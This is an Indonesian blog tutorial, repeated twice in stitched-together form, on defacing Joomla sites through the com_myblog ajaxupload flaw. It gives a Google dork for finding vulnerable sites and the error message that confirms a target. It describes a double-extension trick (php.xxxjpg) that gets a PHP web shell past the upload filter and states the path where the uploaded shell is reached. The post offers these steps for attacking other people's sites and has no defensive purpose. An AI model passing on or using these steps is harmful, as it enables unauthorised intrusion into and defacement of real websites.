Oke kali ini saya mau share tutorial deface dengan Exploit com_myblog
pada CMS Joomla. Exploitnya cukup mudah sehingga bisa langsung
dipraktekkan.
Langsung saja
Google dork : inurl:/components/com_myblog/
Exploiter : download
Exploit : /index.php?option=com_myblog&task=ajaxupload
Jika kalian mendapat error
Tanda nya situsnya vuln.
Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.
Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg
Jika sukses maka akan ada notice seperti di screenshoot :
Shell akses :
localhost/images/shell.php.xxxjpg
Untuk yang kurang jelas bia lihat videonya disini :
MyBB 1.8.x SQL Injection Auto Exploit
Langsung saja
Google dork : inurl:/components/com_myblog/
Exploiter : download
Exploit : /index.php?option=com_myblog&task=ajaxupload
Jika kalian mendapat error
{error: 'No file has been uploaded.', msg: '' }
Tanda nya situsnya vuln.
Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.
Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg
Jika sukses maka akan ada notice seperti di screenshoot :
localhost/images/shell.php.xxxjpg
Untuk yang kurang jelas bia lihat videonya disini :
Dapatkan Tips Menarik Setiap Harinya!
- Dapatkan tips dan trik yang belum pernah kamu tau sebelumnya
- Jadilah orang pertama yang mengetahui hal-hal baru di dunia teknologi
- Dapatkan Ebook Gratis: Cara Dapat 200 Juta / bulan dari AdSense
That was really nice. I recently updated privacy policy and DMCA of my site. Can you please check and say is it okey?
ReplyDelete